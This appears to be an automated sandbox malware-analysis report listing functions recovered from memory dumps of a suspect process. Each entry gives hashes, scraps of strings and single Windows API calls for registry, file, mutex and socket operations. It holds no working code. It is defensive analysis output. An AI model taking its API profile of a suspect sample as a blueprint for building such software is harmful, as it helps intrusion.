Opcode ID: e1eef284db1a3ff724fd8855f78ee26b9283826e4dffd2edd9b1635838afa11f
Instruction ID: 90bcfe1f2dd1f8c53b389b0a18573a8812331be144ea0b3169b207bc38f993fc
Opcode Fuzzy Hash: e1eef284db1a3ff724fd8855f78ee26b9283826e4dffd2edd9b1635838afa11f
Instruction Fuzzy Hash: 7E5103B1F049098FCB05DB69C8806BEB7F6EBC4354B26C57AC11ADB651DB359C028B52

Uniqueness

Uniqueness Score: -1.00%

Function 003F7D90, Relevance: 5.4, Strings: 4, Instructions: 437COMMON

Download Yara Rule

Strings

,"N, xrefs: 003F80B2
#N, xrefs: 003F801A
#N, xrefs: 003F7F86
N, xrefs: 003F81F1

Memory Dump Source

Source File: 00000005.00000002.2597293008.00000000003F0000.00000040.00000001.sdmp, Offset: 003F0000, based on PE: false

Similarity

API ID:
String ID: #N$,"N$ N$#N
API String ID: 0-670881048
Opcode ID: 03189fa6fc82c1102207a64678fa8b152b66fc9c84c0fa00d6cdd3a3b28fee10
Instruction ID: feb017a606adc72e367f88ee7777889d440820f4273f1c15bc50be4560f60597
Opcode Fuzzy Hash: 03189fa6fc82c1102207a64678fa8b152b66fc9c84c0fa00d6cdd3a3b28fee10
Instruction Fuzzy Hash: 6E022330A00609CFCB15DF68C584A69B7F6BF89310F6586AAE94ADB761DB30EC41CF50

Uniqueness

Uniqueness Score: -1.00%

Function 02150298, Relevance: 5.1, Strings: 4, Instructions: 59COMMON

Download Yara Rule

Strings

<2|, xrefs: 02150345
$3|, xrefs: 021502ED
<2|, xrefs: 021502B7
<2|, xrefs: 0215030F

Memory Dump Source

Source File: 00000005.00000002.2597880693.0000000002150000.00000040.00000001.sdmp, Offset: 02150000, based on PE: false

Similarity

API ID:
String ID: $3|$<2|$<2|$<2|
API String ID: 0-2965955211
Opcode ID: c7a55250f843d77f290a52bc327cc53c7ba08da04834da513a1ffb319695a204
Instruction ID: 13b218e7c86e3baeb23a0cfdb868f586a2993611a7bf8c97058b85677badcd69
Opcode Fuzzy Hash: c7a55250f843d77f290a52bc327cc53c7ba08da04834da513a1ffb319695a204
Instruction Fuzzy Hash: BC119D30348260DFC358A768C114A3EB7969F8E34475885ADE87A9B290DBB6D807CB55

Uniqueness

Uniqueness Score: -1.00%

Function 003F9AD0, Relevance: 3.9, Strings: 3, Instructions: 135COMMON

Download Yara Rule

Strings

hQ`, xrefs: 003F9B67
, xrefs: 003F9BEE
*_qq, xrefs: 003F9B1D

Memory Dump Source

Source File: 00000005.00000002.2597293008.00000000003F0000.00000040.00000001.sdmp, Offset: 003F0000, based on PE: false

Similarity

API ID:
String ID: $*_qq$hQ`
API String ID: 0-2566965989
Opcode ID: 6be58454e382acfe062847c980d974505a6b87f96cdd87b0f57dfb42ee873dec
Instruction ID: 57d2f5828500647478433d7211a7e889d8307cd749403744f0f0f7844fe6b601
Opcode Fuzzy Hash: 6be58454e382acfe062847c980d974505a6b87f96cdd87b0f57dfb42ee873dec
Instruction Fuzzy Hash: A041C130F082598FCB12DF65D8807BEB7A6EBC4314B29C46BC616DBA05C635DD828791

Uniqueness

Uniqueness Score: -1.00%

Function 003FE4D8, Relevance: 2.7, Strings: 2, Instructions: 231COMMON

Download Yara Rule

Strings

(m|, xrefs: 003FE76A
(m|, xrefs: 003FE74E

Memory Dump Source

Source File: 00000005.00000002.2597293008.00000000003F0000.00000040.00000001.sdmp, Offset: 003F0000, based on PE: false

Similarity

API ID:
String ID: (m|$(m|
API String ID: 0-2040053251
Opcode ID: 76fce4479735908d22abe15d2e11b74e31867d807e7b8155550fc349619437af
Instruction ID: c14152b0d24e6ecddd3e7f319a6279b461d2b005100111616efd8753ecb6fd0e
Opcode Fuzzy Hash: 76fce4479735908d22abe15d2e11b74e31867d807e7b8155550fc349619437af
Instruction Fuzzy Hash: F081D231B01609DBD708EB74C894BAEB7A6FFC6300F50852DE6158B2A4DF75AC0987D2

Uniqueness

Uniqueness Score: -1.00%

Function 003F3333, Relevance: 2.7, Strings: 2, Instructions: 189COMMON

Download Yara Rule

Strings

, xrefs: 003F3473
*_qq, xrefs: 003F33A7

Memory Dump Source

Source File: 00000005.00000002.2597293008.00000000003F0000.00000040.00000001.sdmp, Offset: 003F0000, based on PE: false

Similarity

API ID:
String ID: $*_qq
API String ID: 0-996541083
Opcode ID: 9d51ce476bbc549ed58f317fe6133f0043b540186dc06f6169c6e05a919e818b
Instruction ID: 7c2db9560b6c4dae96ae6ce446522026083591bd2282192a9fad6e663c98504b
Opcode Fuzzy Hash: 9d51ce476bbc549ed58f317fe6133f0043b540186dc06f6169c6e05a919e818b
Instruction Fuzzy Hash: 1651F271F082088FCB16DF7AC8445BEBBB6EBC5310B25847AC216DB752DB349D468B61

Uniqueness

Uniqueness Score: -1.00%

Function 003F2DD0, Relevance: 2.6, Strings: 2, Instructions: 136COMMON

Download Yara Rule

Strings

, xrefs: 003F2EEE
*_qq, xrefs: 003F2E1D

Memory Dump Source

Source File: 00000005.00000002.2597293008.00000000003F0000.00000040.00000001.sdmp, Offset: 003F0000, based on PE: false

Similarity

API ID:
String ID: $*_qq
API String ID: 0-996541083
Opcode ID: cf90134c4d1a12068a15a11b474eb7a5a7f1420c99834acb76575b8fb6a178e5
Instruction ID: d23508eb497f1da2f4906d27aca3586811d366fe9c22635e4964b6a3eba415da
Opcode Fuzzy Hash: cf90134c4d1a12068a15a11b474eb7a5a7f1420c99834acb76575b8fb6a178e5
Instruction Fuzzy Hash: A441E130F1830ACFCB12DF65C8801BFBB76EB91310B79857AD656DBA05C635D8028791

Uniqueness

Uniqueness Score: -1.00%

Function 003F85D8, Relevance: 2.6, Strings: 2, Instructions: 50COMMON

Download Yara Rule

Strings

+N, xrefs: 003F8605
T0N, xrefs: 003F85F0

Memory Dump Source

Source File: 00000005.00000002.2597293008.00000000003F0000.00000040.00000001.sdmp, Offset: 003F0000, based on PE: false

Similarity

API ID:
String ID: +N$T0N
API String ID: 0-3535671646
Opcode ID: 090d9f8ebdb017d739b67a237d63227c37bcacf261f225a7b24645babb17d9a0
Instruction ID: c5591e3f4bcb4f4c0b8238cbc1745c0b0f9b8f90f75c3003bffd8e81fe6a714e
Opcode Fuzzy Hash: 090d9f8ebdb017d739b67a237d63227c37bcacf261f225a7b24645babb17d9a0
Instruction Fuzzy Hash: 24018032201348CFC72A9F21D598979B3ABFFC9312320493AD6478BA60DF75A905DB55

Uniqueness

Uniqueness Score: -1.00%

Function 004C1648, Relevance: 1.6, APIs: 1, Instructions: 126registryCOMMON

Download Yara Rule

APIs

RegQueryValueExW.KERNEL32(?,00000E40,?,?), ref: 004C173E

Memory Dump Source

Source File: 00000005.00000002.2597386906.00000000004C0000.00000040.00000001.sdmp, Offset: 004C0000, based on PE: false

Similarity

API ID: QueryValue
String ID:
API String ID: 3660427363-0
Opcode ID: a32dbf60508afe6af620436aa6ff5d0cdecc86f173fce7cd9b2422fecc9cbc36
Instruction ID: 342be2d22bd3b36895f17fd965a047512e315c9a670da4498f064364607738d9
Opcode Fuzzy Hash: a32dbf60508afe6af620436aa6ff5d0cdecc86f173fce7cd9b2422fecc9cbc36
Instruction Fuzzy Hash: 3A41206550E7C0AFD3138B318C61A61BF74AF47614B0E85CBE8C4CF5A3D219A90AC7B2

Uniqueness

Uniqueness Score: -1.00%

Function 004C0390, Relevance: 1.6, APIs: 1, Instructions: 93registryCOMMON

Download Yara Rule

APIs

RegQueryValueExA.KERNEL32(?,00000E40), ref: 004C045E

Memory Dump Source

Source File: 00000005.00000002.2597386906.00000000004C0000.00000040.00000001.sdmp, Offset: 004C0000, based on PE: false

Similarity

API ID: QueryValue
String ID:
API String ID: 3660427363-0
Opcode ID: 692596696405ae8d248f00330ed658d36dcbb72243c2134cdae1e3fe35b9f5a5
Instruction ID: 4b6d6f3c5e57be44499152498fa6ed9e777ec586c21e115f43a7d74e99708d46
Opcode Fuzzy Hash: 692596696405ae8d248f00330ed658d36dcbb72243c2134cdae1e3fe35b9f5a5
Instruction Fuzzy Hash: 1031A172004740AFF722CF11CC45FA7FBB8EF06714F04459EFA859A192D2A5A949CB61

Uniqueness

Uniqueness Score: -1.00%

Function 004C07F4, Relevance: 1.6, APIs: 1, Instructions: 92fileCOMMON

Download Yara Rule

APIs

CreateFileW.KERNELBASE(?,?,?,?,?,?), ref: 004C0899

Memory Dump Source

Source File: 00000005.00000002.2597386906.00000000004C0000.00000040.00000001.sdmp, Offset: 004C0000, based on PE: false

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: c62f604f3b39d3164652e804d995283eca0a0099d8dfbf1bb0fe29d26e65184d
Instruction ID: b9ba87c140317aaf003f6f05b8aff333257213a73f974937ec12ff5ea2c398f0
Opcode Fuzzy Hash: c62f604f3b39d3164652e804d995283eca0a0099d8dfbf1bb0fe29d26e65184d
Instruction Fuzzy Hash: F0316F75504340AFE722CB65DC45FA6BBE8EF05210F0884AEE9858B252D365E909DB71

Uniqueness

Uniqueness Score: -1.00%

Function 0015AA02, Relevance: 1.6, APIs: 1, Instructions: 92registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExW.KERNEL32(?,00000E40), ref: 0015AAB1

Memory Dump Source

Source File: 00000005.00000002.2597166544.000000000015A000.00000040.00000001.sdmp, Offset: 0015A000, based on PE: false

Similarity

API ID: Open
String ID:
API String ID: 71445658-0
Opcode ID: 2f1521a7a02cb8897b00517d7a3b2e3326d206c7169a41324f1fcbcdb21d6411
Instruction ID: 4c39fbd45042ebb51ebb955dcf74130df95cb7ff7bbd7a4390f1088a713c77b8
Opcode Fuzzy Hash: 2f1521a7a02cb8897b00517d7a3b2e3326d206c7169a41324f1fcbcdb21d6411
Instruction Fuzzy Hash: 9131A072544384AFE722CB11CC45FA7BBACEF06310F08859AFD858B152D265E909CB72

Uniqueness

Uniqueness Score: -1.00%

Function 0015AF50, Relevance: 1.6, APIs: 1, Instructions: 92COMMON

Download Yara Rule

APIs

GetComputerNameW.KERNEL32(?,00000E40,?,?), ref: 0015AFEA

Memory Dump Source

Source File: 00000005.00000002.2597166544.000000000015A000.00000040.00000001.sdmp, Offset: 0015A000, based on PE: false

Similarity

API ID: ComputerName
String ID:
API String ID: 3545744682-0
Opcode ID: 338809d503292d6c49850e66cfba93baad21f35404e5455d9163c721026181f7
Instruction ID: 9aadea5f5cfb335ce77ea7ff7b6b26a164f74ca4d5a8e1283f68a1cbaa881f25
Opcode Fuzzy Hash: 338809d503292d6c49850e66cfba93baad21f35404e5455d9163c721026181f7
Instruction Fuzzy Hash: 43314F6540E7C0AFD7138B358C65A25BFB4EF47610F0A42DBD884CF5A3D229A919C763

Uniqueness

Uniqueness Score: -1.00%

Function 004C2418, Relevance: 1.6, APIs: 1, Instructions: 89timeCOMMON

Download Yara Rule

APIs

GetProcessTimes.KERNELBASE(?,00000E40,679C6D7E,00000000,00000000,00000000,00000000), ref: 004C24B5

Memory Dump Source

Source File: 00000005.00000002.2597386906.00000000004C0000.00000040.00000001.sdmp, Offset: 004C0000, based on PE: false

Similarity

API ID: ProcessTimes
String ID:
API String ID: 1995159646-0
Opcode ID: 29eaf1d0654704abdf0857fa263194f35435500fb851a209691bff6a17a2d9b9
Instruction ID: aa44ffaf22cb10a88e9fb9836f9d58c42776d9053029e79ab2e6416d0239958e
Opcode Fuzzy Hash: 29eaf1d0654704abdf0857fa263194f35435500fb851a209691bff6a17a2d9b9
Instruction Fuzzy Hash: A631E3B2405380AFEB22CF20DC45F96BFB8EF06310F08849BE985CB193D265A905C765

Uniqueness

Uniqueness Score: -1.00%

Function 004C00F6, Relevance: 1.6, APIs: 1, Instructions: 89synchronizationCOMMON

Download Yara Rule

APIs

CreateMutexW.KERNELBASE(?,?), ref: 004C019D

Memory Dump Source

Source File: 00000005.00000002.2597386906.00000000004C0000.00000040.00000001.sdmp, Offset: 004C0000, based on PE: false

Similarity

API ID: CreateMutex
String ID:
API String ID: 1964310414-0
Opcode ID: 479c4a2dbaa688d120d9acb72aa4d04b42395942a664760aad9bcbc9fd7a44c4
Instruction ID: acf5d7c222df9191a98d211f745a5881a07e8f06851ac39a034c71b6ee0bb3c0
Opcode Fuzzy Hash: 479c4a2dbaa688d120d9acb72aa4d04b42395942a664760aad9bcbc9fd7a44c4
Instruction Fuzzy Hash: F5319075509780AFE712CB25CC85F96FFE8EF06310F08849AE9848B292D725A908C766

Uniqueness

Uniqueness Score: -1.00%

Function 0015AAF9, Relevance: 1.6, APIs: 1, Instructions: 89registryCOMMON

Download Yara Rule

APIs

RegQueryValueExW.KERNEL32(?,00000E40,679C6D7E,00000000,00000000,00000000,00000000), ref: 0015ABB4

Memory Dump Source

Source File: 00000005.00000002.2597166544.000000000015A000.00000040.00000001.sdmp, Offset: 0015A000, based on PE: false

Similarity

API ID: QueryValue
String ID:
API String ID: 3660427363-0
Opcode ID: 03d15b5afda380005c2534dfad2eddaab5d6e2339fc69ec26069884edf29ecb6
Instruction ID: fb8ed8d18d76c37b4044436a7ab87050a9baf9603d3240a7eacae92a588b3320
Opcode Fuzzy Hash: 03d15b5afda380005c2534dfad2eddaab5d6e2339fc69ec26069884edf29ecb6
Instruction Fuzzy Hash: CF3193765093849FE722CF21DC45F92BFA8EF06310F08859AE945CB152D364E949CBA2

Uniqueness

Uniqueness Score: -1.00%

Function 004C04AB, Relevance: 1.6, APIs: 1, Instructions: 86registryCOMMON

Download Yara Rule

APIs

RegQueryValueExW.KERNEL32(?,00000E40,679C6D7E,00000000,00000000,00000000,00000000), ref: 004C055C

Memory Dump Source

Source File: 00000005.00000002.2597386906.00000000004C0000.00000040.00000001.sdmp, Offset: 004C0000, based on PE: false

Similarity

API ID: QueryValue
String ID:
API String ID: 3660427363-0
Opcode ID: 1ab6a7a6fe19b94c4abdc7105e9e72291222ecc0e73b492418379d4f04bd82d8
Instruction ID: 1848fb1722f50659221afd89fc82da5dc2929dc553e752d6dada9a7e6658948f
Opcode Fuzzy Hash: 1ab6a7a6fe19b94c4abdc7105e9e72291222ecc0e73b492418379d4f04bd82d8
Instruction Fuzzy Hash: 0331A075509780AFE722CB21DC44F92BFF8EF06310F0885DAE9858B1A2D224A909CB71

Uniqueness

Uniqueness Score: -1.00%

Function 0015A120, Relevance: 1.6, APIs: 1, Instructions: 86networkCOMMON

Download Yara Rule

APIs

WSAStartup.WS2_32(?,00000E40,?,?), ref: 0015A1C2

Memory Dump Source

Source File: 00000005.00000002.2597166544.000000000015A000.00000040.00000001.sdmp, Offset: 0015A000, based on PE: false

Similarity

API ID: Startup
String ID:
API String ID: 724789610-0
Opcode ID: 86283777c4081435be1f67b9b8acd8c58dd4b41b56d5bac83ba0e29e05d9bf79
Instruction ID: ffaa0c73dffeb11fe5d720dcdbec4505c051271c6271427fcfeceef61d8725d9
Opcode Fuzzy Hash: 86283777c4081435be1f67b9b8acd8c58dd4b41b56d5bac83ba0e29e05d9bf79
Instruction Fuzzy Hash: 2631A07140D3C0AFD3138B358C95B66BFB4EF47620F0981DBD8848F293D229A919C7A2

Uniqueness

Uniqueness Score: -1.00%

Function 004C1FB7, Relevance: 1.6, APIs: 1, Instructions: 83fileCOMMON

Download Yara Rule

APIs

MapViewOfFile.KERNELBASE ref: 004C205E

Memory Dump Source

Source File: 00000005.00000002.2597386906.00000000004C0000.00000040.00000001.sdmp, Offset: 004C0000, based on PE: false

Similarity

API ID: FileView
String ID:
API String ID: 3314676101-0
Opcode ID: 1cfc9000cfb49031935d2ff94e6852e4c3e73a1292715456d15e1ff689da1e1e
Instruction ID: 284a7d22deecf00f19ae4a2f70707c570b74e3e605527511260c4a5a331838a1
Opcode Fuzzy Hash: 1cfc9000cfb49031935d2ff94e6852e4c3e73a1292715456d15e1ff689da1e1e
Instruction Fuzzy Hash: F131A072405384AFE722CB55CC45F56FFF8EF06310F08859EE9848B252D375A908CB66

Uniqueness

Uniqueness Score: -1.00%

Function 004C2C40, Relevance: 1.6, APIs: 1, Instructions: 80windowCOMMON

Download Yara Rule

APIs

FormatMessageW.KERNELBASE(?,00000E40,?,?), ref: 004C2CE2

Memory Dump Source

Source File: 00000005.00000002.2597386906.00000000004C0000.00000040.00000001.sdmp, Offset: 004C0000, based on PE: false

Similarity

API ID: FormatMessage
String ID:
API String ID: 1306739567-0
Opcode ID: 55f92966201b3870019cf5364af006f257c2f0ea7647a8419d4ab3febfff99ef
Instruction ID: 8fd1c1843aa9bd564f8cf72ff92e25f51ccbdd2804869eb0374d583adc23bd77
Opcode Fuzzy Hash: 55f92966201b3870019cf5364af006f257c2f0ea7647a8419d4ab3febfff99ef
Instruction Fuzzy Hash: 6821A17190D3C4AFD312CB658C51B66BFB4EF87610F0981DBD8848F2A3D224A919C7A2

Uniqueness

Uniqueness Score: -1.00%

Function 004C2A55, Relevance: 1.6, APIs: 1, Instructions: 80networkCOMMON

Download Yara Rule

APIs

WSASend.WS2_32(?,00000E40,679C6D7E,00000000,00000000,00000000,00000000), ref: 004C2AEA

Memory Dump Source

Source File: 00000005.00000002.2597386906.00000000004C0000.00000040.00000001.sdmp, Offset: 004C0000, based on PE: false

Similarity

API ID: Send
String ID:
API String ID: 121738739-0
Opcode ID: e9e48bfc4e4103345dd00c8bf29978438d08c83e23a1854ebb8a2a1799d3b10f
Instruction ID: fb0c6b5f532fc5d5c40c3f5dc0786f69c3c8f4705d3f637e0786a2fe5883f7c9
Opcode Fuzzy Hash: e9e48bfc4e4103345dd00c8bf29978438d08c83e23a1854ebb8a2a1799d3b10f
Instruction Fuzzy Hash: AE2190B2404344AFEB22CF51DC44FA7BBECEF45310F0489AAF9859B152D275A919CB71

Uniqueness

Uniqueness Score: -1.00%

Function 004C2F03, Relevance: 1.6, APIs: 1, Instructions: 79networkCOMMON

Download Yara Rule

APIs

WSAEventSelect.WS2_32(?,00000E40,679C6D7E,00000000,00000000,00000000,00000000), ref: 004C2F97

Memory Dump Source

Source File: 00000005.00000002.2597386906.00000000004C0000.00000040.00000001.sdmp, Offset: 004C0000, based on PE: false

Similarity

API ID: EventSelect
String ID:
API String ID: 31538577-0
Opcode ID: 1b42e2d063863fa686a2751b6cd666b02f33b20b7f2a5bd2b32daa193d545e8d
Instruction ID: 1b8609d717544126a84944b663506aa4226d66690f317fe25776cedffad74e5a
Opcode Fuzzy Hash: 1b42e2d063863fa686a2751b6cd666b02f33b20b7f2a5bd2b32daa193d545e8d
Instruction Fuzzy Hash: 1421E2B6409784AFE712CF20CC45F96BFB8EF06314F0884DBE9849B193D275A908C762

Uniqueness

Uniqueness Score: -1.00%

Function 004C02AB, Relevance: 1.6, APIs: 1, Instructions: 79registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExA.KERNEL32(?,00000E40), ref: 004C0353

Memory Dump Source

Source File: 00000005.00000002.2597386906.00000000004C0000.00000040.00000001.sdmp, Offset: 004C0000, based on PE: false

Similarity

API ID: Open
String ID:
API String ID: 71445658-0
Opcode ID: db95296a39bbc1f92f4aad6a9d7d2f7cf1b7c5df5432f90a5a088e6bb0510bf3
Instruction ID: 8844662d5f14252b24144d181fd5c8a573ec3ce8ec9104f7a14307f13ae90a74
Opcode Fuzzy Hash: db95296a39bbc1f92f4aad6a9d7d2f7cf1b7c5df5432f90a5a088e6bb0510bf3
Instruction Fuzzy Hash: E721B575009780AFE7228F10DC45FA6BFB4EF06310F0885DBE9849B1A3D275A919CB76

Uniqueness

Uniqueness Score: -1.00%

Function 004C1ECA, Relevance: 1.6, APIs: 1, Instructions: 78COMMON

Download Yara Rule

APIs

OpenFileMappingW.KERNELBASE(?,?), ref: 004C1F55

Memory Dump Source

Source File: 00000005.00000002.2597386906.00000000004C0000.00000040.00000001.sdmp, Offset: 004C0000, based on PE: false

Similarity

API ID: FileMappingOpen
String ID:
API String ID: 1680863896-0
Opcode ID: 5688c1375111a8d7870d1f0d3e5360c73d95ac6bc1bb20e5853be6cd538c26ad
Instruction ID: b35e032b4639538f5e50fbb0d0d4b93e801192b9b3ab41dc1f8284fcbb6259c0
Opcode Fuzzy Hash: 5688c1375111a8d7870d1f0d3e5360c73d95ac6bc1bb20e5853be6cd538c26ad
Instruction Fuzzy Hash: DA2183B1505780AFE721CB55DC45F66FFE8EF05310F0884AEE9848B293D375A904CB66

Uniqueness

Uniqueness Score: -1.00%

Function 004C08F0, Relevance: 1.6, APIs: 1, Instructions: 78COMMON

Download Yara Rule

APIs

GetFileType.KERNELBASE(?,00000E40,679C6D7E,00000000,00000000,00000000,00000000), ref: 004C0985

Memory Dump Source

Source File: 00000005.00000002.2597386906.00000000004C0000.00000040.00000001.sdmp, Offset: 004C0000, based on PE: false

Similarity

API ID: FileType
String ID:
API String ID: 3081899298-0
Opcode ID: 4608664632108c2ee3861afb9bf8ad7b6c5f5c52d63565a86e3c94fde931a22f
Instruction ID: e7075a5053645acf7cb563957b626c780d2a4f5ad6ef1ce2be4f5eb5a31ad070
Opcode Fuzzy Hash: 4608664632108c2ee3861afb9bf8ad7b6c5f5c52d63565a86e3c94fde931a22f
Instruction Fuzzy Hash: B521DAB6508784AFE712CB159C45FA3BFB8EF46720F0981DBE9848B193D224A905C775

Uniqueness

Uniqueness Score: -1.00%

Function 004C0A9B, Relevance: 1.6, APIs: 1, Instructions: 78fileCOMMON

Download Yara Rule

APIs

DeleteFileA.KERNELBASE(?,00000E40), ref: 004C0B3F

Memory Dump Source

Source File: 00000005.00000002.2597386906.00000000004C0000.00000040.00000001.sdmp, Offset: 004C0000, based on PE: false

Similarity

API ID: DeleteFile
String ID:
API String ID: 4033686569-0
Opcode ID: 6b86b304c9a8432a827f881a15de28b343fa2bc54eec4332270d805ff659a5a4
Instruction ID: 19d615447fa08317d5115cb913380f1f1c7858761b29f892fb28ae357530c5f4
Opcode Fuzzy Hash: 6b86b304c9a8432a827f881a15de28b343fa2bc54eec4332270d805ff659a5a4
Instruction Fuzzy Hash: E721F871508380AFE722CB24DC55FA6BFA8EF46314F1880DEF9849B193D765A909C772

Uniqueness

Uniqueness Score: -1.00%

Function 004C2B4E, Relevance: 1.6, APIs: 1, Instructions: 77networkCOMMON

Download Yara Rule

APIs

WSARecv.WS2_32(?,00000E40,679C6D7E,00000000,00000000,00000000,00000000), ref: 004C2BDE

Memory Dump Source

Source File: 00000005.00000002.2597386906.00000000004C0000.00000040.00000001.sdmp, Offset: 004C0000, based on PE: false

Similarity

API ID: Recv
String ID:
API String ID: 4192927123-0
Opcode ID: 8f79f7b2148bdff673c3a8ecd87780bf8a197656e9331565f8a2c600f34a760d
Instruction ID: 4199118245ef2905fb425ef3b344cf399c5fa6acc77908076b641f05f89872d8
Opcode Fuzzy Hash: 8f79f7b2148bdff673c3a8ecd87780bf8a197656e9331565f8a2c600f34a760d
Instruction Fuzzy Hash: E9218E72405344AFEB22CF51CC45FA7FBB8EF45310F04899BFA859B152D275A909CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 004C176A, Relevance: 1.6, APIs: 1, Instructions: 77networkCOMMON

Download Yara Rule

APIs

WSASocketW.WS2_32(?,?,?,?,?), ref: 004C17F6

Memory Dump Source

Source File: 00000005.00000002.2597386906.00000000004C0000.00000040.00000001.sdmp, Offset: 004C0000, based on PE: false

Similarity

API ID: Socket
String ID:
API String ID: 38366605-0
Opcode ID: ecbc4e734e190d88cccc4b77a75b05e9f75240d217fe436fed561dc248c9a35a
Instruction ID: 9ae3612a40a46d0a5b20934a2c60a9836a457db4431abbaf87d7a0bb62c9ec45
Opcode Fuzzy Hash: ecbc4e734e190d88cccc4b77a75b05e9f75240d217fe436fed561dc248c9a35a
Instruction Fuzzy Hash: 23218071509780AFE722CF51DC45F96FFB8EF05310F0884AEE9858B292D375A808CB66

Uniqueness

Uniqueness Score: -1.00%

Function 004C05B0, Relevance: 1.6, APIs: 1, Instructions: 77COMMON

Download Yara Rule

APIs

SHGetFolderPathW.SHELL32(?,00000E40,?,?), ref: 004C064E

Memory Dump Source

Source File: 00000005.00000002.2597386906.00000000004C0000.00000040.00000001.sdmp, Offset: 004C0000, based on PE: false

Similarity

API ID: FolderPath
String ID:
API String ID: 1514166925-0
Opcode ID: 4d81acc559d72faab06b89d981328f2a44f2d86c256620dc06723b7268b36b44
Instruction ID: 8f51b6c8c7d2e88fb92f405ecee49bc55edb901efc5cf8c5221ac044653511df
Opcode Fuzzy Hash: 4d81acc559d72faab06b89d981328f2a44f2d86c256620dc06723b7268b36b44
Instruction Fuzzy Hash: 5721607540E3C0AFD3128B758C55B62BFB4EF47610F1981CBD8848F693D225A919C7A2

Uniqueness

Uniqueness Score: -1.00%

Function 004C081A, Relevance: 1.6, APIs: 1, Instructions: 76fileCOMMON

Download Yara Rule

APIs

CreateFileW.KERNELBASE(?,?,?,?,?,?), ref: 004C0899

Memory Dump Source

Source File: 00000005.00000002.2597386906.00000000004C0000.00000040.00000001.sdmp, Offset: 004C0000, based on PE: false

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: 521d22d34b41c0e939db7de281c174370df343106c4826a2f41368658e02639b
Instruction ID: 4373c3bbc314b34de669239c3d1f3efc7a01aadb11fe6bd4ccb95b53c70d0fd3
Opcode Fuzzy Hash: 521d22d34b41c0e939db7de281c174370df343106c4826a2f41368658e02639b
Instruction Fuzzy Hash: 29215A75500700EFEB21DF65CC85F66BBE8EB08710F14846EE9898A252D675E904CAB6

Uniqueness

Uniqueness Score: -1.00%

Function 004C03CA, Relevance: 1.6, APIs: 1, Instructions: 75registryCOMMON

Download Yara Rule

APIs

RegQueryValueExA.KERNEL32(?,00000E40), ref: 004C045E

Memory Dump Source

Source File: 00000005.00000002.2597386906.00000000004C0000.00000040.00000001.sdmp, Offset: 004C0000, based on PE: false

Similarity

API ID: QueryValue
String ID:
API String ID: 3660427363-0
Opcode ID: 8111db09c9e5d89eb24c884325817fe4b797db032f57e7ee208b264a8c5125cd
Instruction ID: 92d89410e0d23ddc801dc97c0b93729bbd619b27e1e6738e7b462b4cead0ae12
Opcode Fuzzy Hash: 8111db09c9e5d89eb24c884325817fe4b797db032f57e7ee208b264a8c5125cd
Instruction Fuzzy Hash: 8C21B072100704EFFB21DF11DC81FA7FBA8EF04710F04855AFA459A181D6B5A949CB76

Uniqueness

Uniqueness Score: -1.00%

Function 004C09C0, Relevance: 1.6, APIs: 1, Instructions: 75fileCOMMON

Download Yara Rule

APIs

WriteFile.KERNELBASE(?,00000E40,679C6D7E,00000000,00000000,00000000,00000000), ref: 004C0A51

Memory Dump Source

Source File: 00000005.00000002.2597386906.00000000004C0000.00000040.00000001.sdmp, Offset: 004C0000, based on PE: false

Similarity

API ID: FileWrite
String ID:
API String ID: 3934441357-0
Opcode ID: 6c8c6ab08a547681c015bab7628dac6d18e43bf30889fc3bca31982ffe11c767
Instruction ID: 5103da11b1816bc02c1f75984febcaed7dea210d81dc887cdf81143caaf97d2b
Opcode Fuzzy Hash: 6c8c6ab08a547681c015bab7628dac6d18e43bf30889fc3bca31982ffe11c767
Instruction Fuzzy Hash: 5221A471409380AFE722CF51DC44F56BFB8EF46314F0985DBE9449B153C225A909CB76

Uniqueness

Uniqueness Score: -1.00%

Function 004C286A, Relevance: 1.6, APIs: 1, Instructions: 74COMMON

Download Yara Rule

APIs

setsockopt.WS2_32(?,00000E40,679C6D7E,00000000,00000000,00000000,00000000), ref: 004C28F1

Memory Dump Source

Source File: 00000005.00000002.2597386906.00000000004C0000.00000040.00000001.sdmp, Offset: 004C0000, based on PE: false

Similarity

API ID: setsockopt
String ID:
API String ID: 3981526788-0
Opcode ID: 061bcf90478ed03ac847c54177aa1752fefa31b8b20d50e2d8244b7823b8c1d4
Instruction ID: 0e0916d139b86f4aa9581f3d1b23af37953217f5397233550d23d04f28f55678
Opcode Fuzzy Hash: 061bcf90478ed03ac847c54177aa1752fefa31b8b20d50e2d8244b7823b8c1d4
Instruction Fuzzy Hash: 5F21AFB5505340AFE722CF11DD44FA7BBB8EF45310F08849AE9489B152D275A908CB76

Uniqueness

Uniqueness Score: -1.00%

Function 0015AA32, Relevance: 1.6, APIs: 1, Instructions: 74registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExW.KERNEL32(?,00000E40), ref: 0015AAB1

Memory Dump Source

Source File: 00000005.00000002.2597166544.000000000015A000.00000040.00000001.sdmp, Offset: 0015A000, based on PE: false

Similarity

API ID: Open
String ID:
API String ID: 71445658-0
Opcode ID: 40ff54b11aa78a73aa645a180e093942d9e738fa2a4195ca6f7cb2f69f5c7e78
Instruction ID: 1b488dee04858160102e3928bc4fc595c8e04f321bb3106b314618cf2fad3186
Opcode Fuzzy Hash: 40ff54b11aa78a73aa645a180e093942d9e738fa2a4195ca6f7cb2f69f5c7e78
Instruction Fuzzy Hash: D721BB72500304EFEB21DE11CC84FAABBECEF04310F04865AFD458B241E664E908CAB2

Uniqueness

Uniqueness Score: -1.00%

Function 004C012A, Relevance: 1.6, APIs: 1, Instructions: 72synchronizationCOMMON

Download Yara Rule

APIs

CreateMutexW.KERNELBASE(?,?), ref: 004C019D

Memory Dump Source

Source File: 00000005.00000002.2597386906.00000000004C0000.00000040.00000001.sdmp, Offset: 004C0000, based on PE: false

Similarity

API ID: CreateMutex
String ID:
API String ID: 1964310414-0
Opcode ID: 3ae60d37984c2b4856f9a394fb9211bd67efc818bb684b2e86fa97e02b666704
Instruction ID: 8f644597a575ceaf87637e581a7d3bbb2c5367a63b15f8929da6fe47a04b706a
Opcode Fuzzy Hash: 3ae60d37984c2b4856f9a394fb9211bd67efc818bb684b2e86fa97e02b666704
Instruction Fuzzy Hash: 3E218E75500304EFE720DF65DC85FAAFBE8EF05350F08846EE9488B241DB75E904CA66

Uniqueness

Uniqueness Score: -1.00%

Function 004C0723, Relevance: 1.6, APIs: 1, Instructions: 71COMMON

Download Yara Rule

APIs

